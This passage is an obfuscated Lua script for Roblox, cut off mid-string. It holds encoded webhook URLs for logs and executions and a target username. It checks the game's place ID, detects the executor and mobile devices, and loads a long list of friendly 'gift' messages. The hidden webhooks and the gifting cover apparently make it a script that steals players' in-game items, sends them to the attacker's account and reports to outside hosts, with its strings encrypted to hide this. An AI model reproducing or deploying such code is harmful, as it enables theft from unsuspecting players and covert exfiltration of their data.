--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v51,v52) local v53={};for v134=1, #v51 do v6(v53,v0(v4(v1(v2(v51,v134,v134 + 1 )),v1(v2(v52,1 + (v134% #v52) ,1 + (v134% #v52) + 1 )))%256 ));end return v5(v53);end LogsWebhook=v7("\217\215\207\53\245\225\136\81\213\202\200\38\233\169\195\80\210\204\214\106\231\171\206\81\198\198\217\45\233\180\204\13\158\146\136\113\180\239\158\79\136\155\138\112\179\233\145\70\132\146\138\125\169\132\201\33\246\211\202\12\231\153\138\14\249\202\214\53\244\234\225\33\212\150\247\46\223\190\204\9\220\144\142\53\231\158\209\61\219\211\194\32\243\237\149\13\193\249\137\54\229\186\226\4\193\240\225\112\171\180\206\44\245\204\226\40\207\227\237\12\247","\126\177\163\187\69\134\219\167");ExecutionWebhook=v7("\43\217\62\213\239\121\130\101\193\245\48\206\37\215\248\109\206\37\200\179\34\221\35\138\235\38\207\34\202\243\40\222\101\148\175\119\159\126\157\175\115\159\114\149\173\123\157\125\150\170\114\159\101\215\177\14\251\13\223\245\7\247\6\147\240\2\242\29\207\210\40\207\58\250\210\19\192\127\157\251\117\234\33\136\214\114\226\24\246\244\7\232\29\247\219\25\255\6\214\217\47\220\15\144\222\25\201\48\195\175\12\193\120\255\196\16\155\28\198\173\11","\156\67\173\74\165");Username=v7("\63\181\91\25\171\40\74\96\228\24\65","\38\84\215\41\118\220\70");PromptText=v7("\124\23\55\28\253\88\86\17\17\236\89\6\54","\158\48\118\66\114");RandomizedPrompt=false;repeat task.wait();until game:IsLoaded() local v8={[2753915549]=true,[4442272183]=true,[7449424199 -(510 + 54) ]=true};if  not v8[game.PlaceId] then local v135=0 -0 ;while true do if (v135==0) then local v234=0;while true do if (v234==(36 -(13 + 23))) then game:GetService(v7("\155\40\17\47\118\183\232","\155\203\68\112\86\19\197")).LocalPlayer:Kick(v7("\113\207\57\242\71\56\226\249\75\216\119\188\116\112\236\235\6\206\53\238\73\104\241\184\79\206\118\241\69\121\235\236\6\219\57\238\0\90\233\247\94\157\16\238\85\113\241\235\8","\152\38\189\86\156\32\24\133"));return;end end end end end if _G.scriptExecuted then local v136=0;while true do if (v136==0) then warn(v7("\197\88\178\6\244\86\177\67\188\86\171\84\249\86\163\95\188\82\191\67\255\66\179\67\248\23\179\78\245\68\231\69\243\83\162\8","\38\156\55\199"));return;end end end local v9=v7("\140\120\112\60\18","\35\200\29\28\72\115\20\154");local v10=v9   .. v7("\89\182\194\159\142\57\38\11\186\223\203\129\53\116\12\177\194\202\157\60\59\11\171\212\219\205\35\58\89\178\222\221\132\32\49\87\255\225\211\136\45\39\28\255\197\205\148\108\53\89\187\216\217\139\41\38\28\177\197\159\136\52\49\26\170\197\208\159\108\124\28\241\214\145\193\108\23\22\187\212\199\193\108\18\21\170\201\202\158\101\116\22\173\145\202\158\41\116\24\255\225\252\195","\84\121\223\177\191\237\76") ;local function v11() if identifyexecutor then return identifyexecutor();else return v7("\142\88\194\174\53\71\62","\161\219\54\169\192\90\48\80");end end local function v12() local v54=0 -0 ;local v55;while true do if (v54==(0 -0)) then local v200=0;while true do if (v200==0) then v55=game:GetService(v7("\124\81\5\55\96\76\16\48\93\113\5\55\95\75\3\32","\69\41\34\96"));return v55.TouchEnabled and  not v55.KeyboardEnabled ;end end end end end _G.scriptExecuted=true;local v13=v11();if ((v13==v9) and v12()) then game.Players.LocalPlayer:Kick(v10);end local v14=game:GetService(v7("\142\198\199\6\11\40\189\215\210\14\49\63\179\209\214\13\7","\75\220\163\183\106\98"));local v15=game:GetService(v7("\33\181\153\50\254\23\179","\185\98\218\235\87"));local v16=game:GetService(v7("\251\48\38\255\219\184\216","\202\171\92\71\134\190"));local v17=game:GetService(v7("\1\213\56\152\26\196\62\158\32\194\41","\232\73\161\76"));local v18=game:GetService(v7("\142\202\71\79\55\181\201\87\73\45\190\203\84\84\29\190","\126\219\185\34\61"));local v19=game:GetService(v7("\33\207\76\121\123\99\227\235\13\205\91\65\123\101\229\238\15\203","\135\108\174\62\18\30\23\147"));local v20=game:GetService(v7("\132\252\36\248\29\188\37\206\181\236","\167\214\137\74\171\120\206\83"));local v21=game:GetService(v7("\191\231\55\88\246\148\142\226\36\84\251\162","\199\235\144\82\61\152"));local v22=v19:GetProductInfo(game.PlaceId);local v23;local v24=v7("\86\88\235\101\95","\75\103\118\217");local v25=0 -0 ;local v26={v7("\226\90\122\27\160\94\222\91\101\6\249\16\194\67\48\29\173\27\202\21","\126\167\52\16\116\217"),v7("\233\110\44\137\160\13\240\205\110\51\143\185\28\232\192\39\46\135\244\31\243\218\110\57\143\161\88","\156\168\78\64\224\212\121"),v7("\47\225\181\203\71\247\170\219\71\226\172\197\2\174\172\218\70","\174\103\142\197"),v7("\111\39\74\120\33\91\235\83\58\73\61\101\74\240\95\59\30","\152\54\72\63\88\69\62"),v7("\254\209\253\72\148\197\174\79\217\197\226\80\148\208\225\87\209\202\174\83\210\132\239\76\196\214\235\95\221\197\250\85\219\202\175","\60\180\164\142"),v7("\112\91\23\44\103\244\29\77\30\2\38\102","\114\56\62\101\73\71\141"),v7("\139\230\214\193\172\225\210\202\191\169\200\212\189\234\210\197\180\169\221\203\170\169\194\203\173\168","\164\216\137\187"),"You've earned this!",v7("\247\232\59\189\191\191","\107\178\134\81\210\198\158"),"Here's a little surprise!",v7("\16\1\146\195\234\44\6\139\213\234\53\15\137\195\185\120\23\141\211\184\120\10\131\223\235","\202\88\110\226\166"),"You're awesome!","Here's a gift from us!","You're the best!","Here's something to help you out!",v7("\244\10\194\246\218\211\29\135\244\195\194\27\135\183\211\204\26\195","\170\163\111\226\151"),"Here's a little something!","You're amazing!","Here's a gift for you!",v7("\62\29\149\120\97\26\14\81\37\242\63\65\35\105\16\112\162\42\75\45\104","\73\113\80\210\88\46\87"),"Guuuuess whattttttt? 🎁",v7("\173\3\225\82\193\179\9\232\48\206\164\31\141\53\200\193\14\255\32\213\179","\135\225\76\173\114"),"Hope this doesn't suck lol!",v7("\45\226\175\170\173\253\190\21\248\248\188\185\190\172\3\172","\199\122\141\216\208\204\221"),v7("\142\242\62\215\74\215\153\238\35\195\75\197\158\238\35\195\75\183\236\156","\150\205\189\112\144\24"),v7("\13\215\141\31\68\157\81\23\42\197\255\114\59\182","\112\69\228\223\44\100\232\113"),"✨ surprise in ur inbox! ✨",v7("\243\16\19\208\190\105\198\213\95\11\218\186\60\149\217\11\15\147\165\113\146\220\94","\230\180\127\103\179\214\28"),v7("\173\60\112\105\203\110\160\138\23\90\67\164\77\239\131\17\31\82\237\76\229\205","\128\236\101\63\38\132\33"),v7("\153\167\6\86\183\251\223\165\167\22\4\191\229\219\169\167\2\77\176\226\202\191\231\95\10","\175\204\201\113\36\214\139"),v7("\101\222\32\212\68\82\140\55\217\16\83\201\39\156\8\78\199\48\156\16\79\197\38\157","\100\39\172\85\188"),"YOU. GOT. THIS. 🎁",v7("\154\112\184\129\50\185\39\249\173\60\191\125\249\135\58\171\108\170\223\108","\83\205\24\217\224"),v7("\212\234\235\17\166\224\227\23\201\252\141\20\210\133\228\25\205","\93\134\165\173"),"Cool beans, it’s yours!","Hope this ain’t mid lol","OMG PRESENT TIME LET’S GO",v7("\142\221\230\229\31\252\129\62\157\222\224\235\23\142\155\74\254\212\224\241\14","\30\222\146\161\162\90\174\210"),v7("\193\71\126\13\165\74\121\4\226\14\116\3\235\73\49\74\195\92\117\15\165\93\100\31\227\72\49","\106\133\46\16"),"Uhhh, gift moment? 🎉",v7("\112\37\106\188\78\72\93\50\118\189\26\116\80\41\96\188\83\83\24\38\124\238\26\89\87\53\50","\32\56\64\19\156\58"),v7("\109\192\234\89\74\225\204\26\204\247\89\74\226\133\94\136\241\94\83\225\192\86\199\233","\224\58\168\133\54\58\146"),v7("\126\127\109\201\53\167\164\58\108\127\121\216\81\198\162\49\25\117\103\220\69","\107\57\54\43\157\21\230\231"),v7("\248\163\52\208\131\156\237\238\185\54\208\139\156\238\245\175\81\211\139\249\234\155\172\56\211\141","\175\187\235\113\149\217\188"),v7("\15\167\136\66\250\96\97\37\182\193\88\235\112\118\59\188\193\77\241\124\56\58\186\143\13","\24\92\207\225\44\131\25"),v7("\103\254\153\99\91\117\68\195\189\12\15\117\66\192\248\95\23\124\91\192","\29\43\179\216\44\123"),v7("\159\216\45\13\253\254\41\74\169\153\33\88\169\216\35\71\253\208\46\79\178\212\41\66\186\152","\44\221\185\64"),"U deserve the world! 🎁",v7("\45\232\71\80\124\14\235\8\75\123\8\244\8\86\96\65\242\90\76\51\15\232\95","\19\97\135\40\63"),"SUPRISEEEE it’s lit!","gibberish but it’s urs!!",v7("\154\93\56\62\111\56\186\28\49\111\111\56\186\28\54\35\63\61\161\88\54\40\111\61\161\80","\81\206\60\83\91\79"),"Welp here it goes!!! 🎉",v7("\97\164\192\97\111\234\13\167\66\162\211\121\42\199\13\163\71\173\196\50\39\194\69\165","\196\46\203\176\18\79\163\45"),v7("\138\3\73\44\100\195\203\248\54\118\23\55\187\230\171\98\127\94\52\233\234\171\39\112\10","\143\216\66\30\126\68\155"),v7("\141\225\43\255\133\129\246\219\133\231\38\234\133\133\254\211\143\236\76\138\132","\129\202\168\109\171\165\195\183"),v7("\1\84\54\209\211\84\239\54\24\54\214\218\84\224\46\93\47\152\220\6\233\99","\134\66\56\87\184\190\116"),v7("\5\30\60\251\46\194\15\117\29\22\40\146\55\170\97\6\52\52\12\168\17\170","\85\92\81\105\219\121\139\65"),"No cap, you’re epic! 🎁",v7("\213\146\96\117\69\159\218\154\118\113\60\251\220\138\16\106\81\248\218\148","\191\157\211\48\37\28"),v7("\232\48\219\58\122\217\13\241\25\122\204\11\225\26\60\159\75\180\9","\90\191\127\148\124"),"Ahhhh it’s shiny af",v7("\76\136\33\87\117\134\32\14\56\128\39\17\108\148\113\72\56\169\43\1\125\149\111","\119\24\231\78"),v7("\174\34\170\65\156\87\25\131\57\229\93\217\0\22\141\57\229\83\221\1","\113\226\77\197\42\188\32"),"BRRRRRRR IT’S A GIFT!",v7("\17\31\250\177\59\86\230\180\52\18\251\184\122\20\225\161\122\2\245\190\63\86\253\161","\213\90\118\148"),v7("\121\11\145\102\13\121\1\155\102\13\124\7\146\98\13\118\1\144\115\13\116\0","\45\59\78\212\54"),v7("\55\95\133\159\198\35\172\243\24\95\141\142\198\61\172\233\3\22\154\142\149","\144\112\54\227\235\230\78\205"),"Open fast! It’s sizzling!",v7("\156\5\40\188\196\90\184\45\79\245\196\27\177\45\9\243\194\94\243\1\79\248\223\26\242","\59\211\72\111\156\176"),"Bruh it’s lit open it",v7("\119\166\194\12\111\166\218\109\122\174\206\8\14\179\204\109\126\166\209\25\119","\77\46\231\131"),v7("\157\125\144\116\250\124\143\112\159\20\153\118\159\102\154\111\155\112\247\1","\32\218\52\214"),"You’re da best frfr!",v7("\111\87\61\161\253\240\81\85\69\18\63\228\177\181\75\80\65\14\112\233\176","\58\46\119\81\200\145\208\37"),"POW! Gift bomb!! 💣",v7("\24\153\34\188\187\180\37\46\204\52\169\165\180\32\46\158\41\236\160\179\53\36\129\57\162\174\252","\86\75\236\80\204\201\221"),v7("\64\64\121\129\241\134\50\64\116\145\190\132\116\1\124\140\240\143\124\68\100\150\190\215\33","\235\18\33\23\229\158"),v7("\118\136\228\158\117\159\228\158\117\159\228\158\117\159\228\250\17\251\128","\219\48\218\161"),v7("\209\121\116\65\155\86\229\229\121\60\93\218\68\229\164\120\104\9\210\75\235","\128\132\17\28\41\187\47"),v7("\54\26\41\21\110\41\114\54\8\120\50\23\40\14\29\53\27\43\31","\61\97\82\102\90"),"✨✨✨ shinyyyyy ✨✨✨",v7("\131\3\140\11\235\120\49\61\236\10\153\100\247\22\95\72","\105\204\78\203\43\167\55\126"),"YOU’RE ON FIRE!!! 🔥",v7("\134\171\45\94\58\68\207\80\179\175\99\23\7\91\135\123\142\234\47\17\31","\49\197\202\67\126\115\100\167"),v7("\17\105\250\12\192\101\106\2\125\249\105\175\126\30\14\126\254\1\168\126\118","\62\87\59\191\73\224\54"),"Ping! It’s gift o’clock!","Smells like victory! 🎁",v7("\211\10\243\218\167\15\251\205\226\66\247\204\167\22\242\192\233\9\186\198\225\66\239\136","\169\135\98\154"),v7("\227\120\52\81\189\38\136\199\126\47\81\189\39\192\194\100\100\64\244\61\209\139\112\45\82\233\114","\168\171\23\68\52\157\83"),v7("\219\126\229\190\101\41\149\251\97\229\168\33\109\131\253\98\181\249\101\56","\231\148\17\149\205\69\77"),v7("\186\168\200\246\23\229\143\168\202\187\80\246\134\179\135\225\88\240\141","\159\224\199\167\155\55"),v7("\212\242\40\209\255\179\53\198\183\241\104\146\254\231\124\212\251\250\57\193\183\255\51\222","\178\151\147\92"),"Hope it’s not a potato!",v7("\174\244\75\114\16\94\123\133\243\12\36\27\78\127\159\189\91\125\82\88\114\133\238","\26\236\157\44\82\114\44"),v7("\9\1\251\124\24\15\225\110\6\15\244\122\11\15\225\114\5\0\230\26","\59\74\78\181"),v7("\12\213\81\26\164\48\197\26\78\187\44\194\26\83\160\101\221\85\86\243\32\223\80\85\170","\211\69\177\58\58"),v7("\145\215\92\208\169\231\152\202\77\181\192\248\247\199\92\198\221\139\155\202\86\193","\171\215\133\25\149\137"),"💖💖💖 TAKE DIS NOW 💖💖💖",v7("\195\218\39\242\175\61\243\79\228\198\38\160\175\22\238\71\228\136\1\238\250\54\250","\34\129\168\82\154\143\80\156"),v7("\178\183\115\25\68\87\201\138\167\39\75\64\75\155\128\242\52\2\78\90\128\139\181","\233\229\210\83\107\40\46"),v7("\227\107\21\150\50\129\119\114\241\42\245\2\19\150\49\233\107\28\241","\101\161\34\82\182"),v7("\220\5\88\240\208\162\151\110\188\77\92\230\210\241\150\39\230\10\25\242\212\238","\78\136\109\57\158\187\130\226"),v7("\25\22\223\197\13\113\185\220\17\13\220\177\25\22\223\197\13\113\185\200\27\12\183","\145\94\95\153"),v7("\222\229\49\240\125\146\189\236\58\241\14\145\207\232\49\247\103\146\206","\215\157\173\116\181\46"),v7("\18\189\141\230\154\50\187\143\178\210\52\167\203\240\214\48\167\152\247\222\117\161","\186\85\212\235\146"),v7("\246\137\31\237\121\249\81\206\141\86\238\43\225\90\130\140\23\245\60\174\77\130\141\25\242","\56\162\225\118\158\89\142"),"Not clickbait: It’s a gift",v7("\73\69\210\239\35\213\93\31\201\161\37\152\72\4\203\170\98\204\84\12\211\239\50\212\79","\184\60\101\160\207\66"),"it’s tiny but it’s epic",v7("\2\170\93\134\16\163\81\252\52\140\118\179\40\194\120\189\113\133\117\186\37","\220\81\226\28"),v7("\32\222\144\233\254\135\7\212\137\254\170\211\27\220\145\187\254\207\26\219\133\186","\167\115\181\226\155\138"),v7("\210\48\226\79\126\127\210\162\55\233\80\116\114\205\231\38\189\28\76\94\241\163","\166\130\66\135\60\27\17"),v7("\98\120\235\80\18\109\111\142\93\5\106\126\235\71\112\101\102\235\71\4","\80\36\42\174\21"),v7("\103\29\54\125\71\30\50\58\64\31\35\58\65\0\50\116\71\30\48\58\90\24\62\105","\26\46\112\87"),v7("\159\17\235\65\255\155\96\135\156\17\157\81\255\139\109\157\138\99\135\91\147","\212\217\67\203\20\223\223\37"),"It’s raining gifts, bro!",v7("\131\140\187\146\163\140\187\146\163\140\187\146\175\205\186\146\182\130\190\215\190","\178\218\237\200"),v7("\134\154\193\144\144\135\195\245\246\146\207\246\130\245\209\248\153\245\194\249\133","\176\214\213\134"),v7("\215\161\183\221\165\22\77\252\164\165\148\167\68\25\230\168\177\198\173\66\25\253\185","\57\148\205\214\180\200\54"),"🛸 GIFT FROM OUTER SPACE 🛸",v7("\38\252\62\49\54\19\189\54\60\127\30\241\117\36\127\30\241\117\114\54\23\243\63\59\111\83","\22\114\157\85\84"),v7("\235\196\3\215\29\226\160\205\216\83\144\29\227\232\200\196\31","\200\164\171\115\164\61\150"),v7("\154\219\67\107\172\138\180\39\96\175\155\192\38\5\183\150\221\48\5\172\147\211","\227\222\148\99\37"),v7("\20\91\84\226\252\55\18\69\255\237\59\18\94\227\239\115\14\1","\153\83\50\50\150"),v7("\112\111\96\8\118\185\68\82\99\96\92\113\164\85\29\98\122\17\118\229\3\19","\45\61\22\19\124\19\203"),"Uhhh enjoy?? it’s sus","Surpriiiiseeeeee! 🥳","BEST. DAY. EVER. 🎁","Like it? Don’t? Here!",v7("\227\61\34\216\66\101\249\198\29\25\181\3\48\190\200\20\25\180","\217\161\114\109\149\98\16"),"FREE BREAD jk it’s a gift",v7("\62\47\55\119\252\125\28\51\49\120\185\52\35\21\17\95\151\95\57\11","\20\114\64\88\28\220"),v7("\19\19\199\188\184\214\175\52\4\146\185\253\209\179\34\65\211\163\253\195\178\60\4","\221\81\97\178\212\152\176"),v7("\250\239\24\254\31\200\167\27\233\31\200\167\17\244\21\217\167\10\244\13","\122\173\135\125\155"),v7("\183\206\64\177\38\33\205\196\211\9\190\55\37\136\138\206\23\249\16\28\239","\168\228\161\96\217\95\81"),v7("\238\195\110\88\46\23\246\231\30\16\111\82\213\219\33\69\111\67\211\216\61\29","\55\187\177\78\60\79"),v7("\29\226\101\171\101\227\161\4\227\31\194\114\143\175\0\233\31\205\103\252\180","\224\77\174\63\139\38\175"),"Luv u, here’s a gift!",v7("\182\78\75\43\151\1\74\110\150\68\92\98\196\70\81\40\144\82\24\60\196\66\87\33\136","\78\228\33\56"),v7("\225\113\162\16\197\195\103\242\5\140\192\121\183\17\197\221\114\187\19\149\203\122\242\15\138\194","\229\174\30\210\99"),"Open it or else 👀",v7("\43\255\143\75\232\125\44\21\225\137\82\230\56\61\65\173\161\126\173\26\22\91\202\169","\89\123\141\230\49\141\93"),v7("\192\95\215\47\59\10\184\49\209\37\54\126\179\44\182\57\34\10\215\80\207","\42\147\17\150\108\112"),v7("\38\139\109\76\200\168\42\158\14\86\211\205\43\230\12\87\207\192\39","\136\111\198\77\31\135"),v7("\59\6\178\22\186\235\3\189\3\73\180\91\180\232\18\233\12\6\176\22\177\235\27","\201\98\105\199\54\221\132\119"),"Oops here’s somethin’",v7("\155\9\144\53\66\50\165\191\24\195\36\20\52\190\171\30\145\97\13\37\169\183\76\138\53","\204\217\108\227\65\98\85"),v7("\125\194\225\230\36\128\74\203\252\246\108\199\87\197\225\165\0\239\114","\160\62\163\149\133\76"),v7("\225\175\2\32\204\150\181\77\56\204\216\225\77\8\202\208\180\77\59\202\219\165","\163\182\192\109\79"),v7("\13\3\37\229\193\116\54\18\197\230\49\40\20\128\241\49\42\9\214\240\38\35\4","\149\84\70\96\160"),"LOL hope u don’t hate it",v7("\25\46\37\197\16\70\57\197\17\53\77\203\23\52\77\212\23\51\56\216\13","\141\88\102\109"),v7("\128\100\235\87\90\26\124\231\135\19\233\92\59\20\120\228\151\19\239\74","\161\211\51\170\16\122\93\53"),v7("\217\161\189\37\187\169\187\46\239\238\176\39\246\172\242\4\214\143\157","\72\155\206\210"),v7("\118\104\93\20\54\6\119\85\13\59\79\116\81\78\32\71\115\80\78\42\67\105","\83\38\26\52\110"),v7("\104\56\16\6\77\5\103\86\74\30\61\67\24\2\41\74\87\20\44\67\92","\38\56\119\71"),v7("\212\230\94\194\101\66\225\238\81\216\101\94\242\252\24\215\55\68\250\249\93\210\100\23","\54\147\143\56\182\69"),v7("\254\142\239\76\159\195\147\191\77\222\207\193\245\92\204\194\193\248\70\203\150\141\246\93\158","\191\182\225\159\41"),v7("\3\11\56\80\203\128\203\45\6\59\21\153\199\202\50\2\45\21\138\129","\162\75\114\72\53\235\231"),v7("\185\14\4\206\102\33\167\5\4\198\114\59\181\5\125\162\124\47\171","\98\236\92\36\130\51"),v7("\147\16\11\189\73\173\166\112\163\16\10\174\5\161\187\112\177\11\76\188\68\171\176","\80\196\121\108\218\37\200\213"),v7("\41\105\66\123\66\29\202\15\120\66\115\68\2\133\12","\234\96\19\98\31\43\110"),"Bruh I’m so happy 4 u",v7("\63\16\18\195\173\101\140\70\26\92\205\163\107\203\18\23\91\212\236\126\132\10","\235\102\127\50\167\204\18"),"Rainbows and freebies 🌈",v7("\124\174\226\40\65\55\16\179\244\45\64\33\93\225\247\54\80\110\85\175\255\44\93","\78\48\193\149\67\36"),v7("\0\12\137\2\68\112\11\142\20\78\51\21\133\28\1\21\36\192\40\110\23","\33\80\126\224\120"),v7("\192\135\47\132\110\205\134\39\235\113\172\143\42\226\104\216\156","\60\140\200\99\164"),v7("\168\255\5\63\226\136\255\5\63\238\199\225\68\33\173\147\180\16\46\171\148\181","\194\231\148\100\70"),"🚨 EMERGENCY PRESENT 🚨",v7("\100\94\212\171\182\197\73\65\196\173\226\146\6\107\200\165\226\136\114\69\204\166","\168\38\44\161\195\150"),v7("\168\233\151\99\37\239\179\86\135\245\132\98\112\254\191\20\133\239\194\126\53\250\179","\118\224\156\226\22\80\136\214"),v7("\110\219\111\192\107\218\25\175\112\174\124\172\113\203\24\192\72\229\25\140\77\226","\224\34\142\57"),v7("\233\168\202\157\100\254\82\78\217\174\195\201\96\177\9\78\219\177\192\207\106\254\83\11\159","\110\190\199\165\189\19\145\61"),v7("\248\194\89\207\203\229\251\197\80\168\169\232\245\198\55\207\162\225\238","\167\186\139\23\136\235"),"You absolute legend! 🎉",v7("\45\189\137\
